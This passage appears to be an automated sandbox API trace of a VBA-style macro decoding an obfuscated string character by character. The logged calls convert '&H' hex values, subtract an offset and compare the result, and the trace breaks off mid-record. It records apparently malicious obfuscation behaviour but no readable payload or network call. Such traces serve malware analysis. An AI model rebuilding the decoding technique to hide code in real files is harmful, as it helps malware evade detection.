VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.908] GetUserDefaultLCID () returned 0x409 [0174.908] malloc (_Size=0xa0) returned 0x11f50080 [0174.908] free (_Block=0x11f50080) [0174.908] VarBstrCat (in: bstrLeft="&H", bstrRight="b2", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.909] GetUserDefaultLCID () returned 0x409 [0174.909] VarI2FromStr (in: strIn="&Hb2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.909] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.909] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.909] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.909] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.909] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.909] GetUserDefaultLCID () returned 0x409 [0174.909] malloc (_Size=0xa0) returned 0x11f50080 [0174.909] free (_Block=0x11f50080) [0174.910] VarBstrCat (in: bstrLeft="&H", bstrRight="af", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.910] GetUserDefaultLCID () returned 0x409 [0174.910] VarI2FromStr (in: strIn="&Haf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.910] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.910] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.910] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.910] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.910] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.910] GetUserDefaultLCID () returned 0x409 [0174.910] malloc (_Size=0xa0) returned 0x11f50080 [0174.910] free (_Block=0x11f50080) [0174.911] VarBstrCat (in: bstrLeft="&H", bstrRight="9b", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.911] GetUserDefaultLCID () returned 0x409 [0174.911] VarI2FromStr (in: strIn="&H9b", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.911] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.911] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.911] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.911] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.911] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.911] GetUserDefaultLCID () returned 0x409 [0174.911] malloc (_Size=0xa0) returned 0x11f50080 [0174.912] free (_Block=0x11f50080) [0174.912] VarBstrCat (in: bstrLeft="&H", bstrRight="a6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.912] GetUserDefaultLCID () returned 0x409 [0174.912] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.912] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.912] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.912] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.913] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.913] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.913] GetUserDefaultLCID () returned 0x409 [0174.913] malloc (_Size=0xa0) returned 0x11f50080 [0174.913] free (_Block=0x11f50080) [0174.913] VarBstrCat (in: bstrLeft="&H", bstrRight="97", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.913] GetUserDefaultLCID () returned 0x409 [0174.913] VarI2FromStr (in: strIn="&H97", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.913] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.914] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.914] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.914] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.914] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.914] GetUserDefaultLCID () returned 0x409 [0174.914] malloc (_Size=0xa0) returned 0x11f50080 [0174.914] free (_Block=0x11f50080) [0174.914] VarBstrCat (in: bstrLeft="&H", bstrRight="b4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.914] GetUserDefaultLCID () returned 0x409 [0174.914] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.915] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.915] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.915] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.915] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.915] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.915] GetUserDefaultLCID () returned 0x409 [0174.915] malloc (_Size=0xa0) returned 0x11f50080 [0174.915] free (_Block=0x11f50080) [0174.915] VarBstrCat (in: bstrLeft="&H", bstrRight="b0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.915] GetUserDefaultLCID () returned 0x409 [0174.915] VarI2FromStr (in: strIn="&Hb0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.916] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.916] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.916] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.916] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.916] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.916] GetUserDefaultLCID () returned 0x409 [0174.916] malloc (_Size=0xa0) returned 0x11f50080 [0174.916] free (_Block=0x11f50080) [0174.916] VarBstrCat (in: bstrLeft="&H", bstrRight="90", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.917] GetUserDefaultLCID () returned 0x409 [0174.917] VarI2FromStr (in: strIn="&H90", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.917] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.917] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.917] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.917] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.917] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.917] GetUserDefaultLCID () returned 0x409 [0174.917] malloc (_Size=0xa0) returned 0x11f50080 [0174.917] free (_Block=0x11f50080) [0174.918] VarBstrCat (in: bstrLeft="&H", bstrRight="b1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.918] GetUserDefaultLCID () returned 0x409 [0174.918] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.918] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.918] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.919] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.919] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.919] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.919] GetUserDefaultLCID () returned 0x409 [0174.919] malloc (_Size=0xa0) returned 0x11f50080 [0174.919] free (_Block=0x11f50080) [0174.919] VarBstrCat (in: bstrLeft="&H", bstrRight="ae", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.919] GetUserDefaultLCID () returned 0x409 [0174.919] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.920] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.920] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.920] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.920] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.920] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.920] GetUserDefaultLCID () returned 0x409 [0174.920] malloc (_Size=0xa0) returned 0x11f50080 [0174.920] free (_Block=0x11f50080) [0174.920] VarBstrCat (in: bstrLeft="&H", bstrRight="a6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.920] GetUserDefaultLCID () returned 0x409 [0174.920] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.921] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.921] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.921] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.921] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.921] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.921] GetUserDefaultLCID () returned 0x409 [0174.921] malloc (_Size=0xa0) returned 0x11f50080 [0174.921] free (_Block=0x11f50080) [0174.922] VarBstrCat (in: bstrLeft="&H", bstrRight="8f", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.922] GetUserDefaultLCID () returned 0x409 [0174.922] VarI2FromStr (in: strIn="&H8f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.922] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.922] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.922] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.922] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0174.922] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.922] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.922] GetUserDefaultLCID () returned 0x409 [0174.922] malloc (_Size=0xa0) returned 0x11f50080 [0174.922] free (_Block=0x11f50080) [0174.923] VarBstrCat (in: bstrLeft="&H", bstrRight="b2", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.923] GetUserDefaultLCID () returned 0x409 [0174.923] VarI2FromStr (in: strIn="&Hb2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.923] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.923] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.923] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.923] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.923] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.923] GetUserDefaultLCID () returned 0x409 [0174.923] malloc (_Size=0xa0) returned 0x11f50080 [0174.924] free (_Block=0x11f50080) [0174.924] VarBstrCat (in: bstrLeft="&H", bstrRight="af", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.925] GetUserDefaultLCID () returned 0x409 [0174.925] VarI2FromStr (in: strIn="&Haf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.925] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.925] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.925] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.925] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.925] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.925] GetUserDefaultLCID () returned 0x409 [0174.925] malloc (_Size=0xa0) returned 0x11f50080 [0174.925] free (_Block=0x11f50080) [0174.926] VarBstrCat (in: bstrLeft="&H", bstrRight="9b", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.926] GetUserDefaultLCID () returned 0x409 [0174.926] VarI2FromStr (in: strIn="&H9b", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.926] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.926] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.926] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.926] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.926] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.926] GetUserDefaultLCID () returned 0x409 [0174.926] malloc (_Size=0xa0) returned 0x11f50080 [0174.926] free (_Block=0x11f50080) [0174.927] VarBstrCat (in: bstrLeft="&H", bstrRight="a6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.927] GetUserDefaultLCID () returned 0x409 [0174.927] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.927] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.927] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.927] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.927] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.927] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.927] GetUserDefaultLCID () returned 0x409 [0174.927] malloc (_Size=0xa0) returned 0x11f50080 [0174.928] free (_Block=0x11f50080) [0174.928] VarBstrCat (in: bstrLeft="&H", bstrRight="97", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.928] GetUserDefaultLCID () returned 0x409 [0174.928] VarI2FromStr (in: strIn="&H97", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.928] 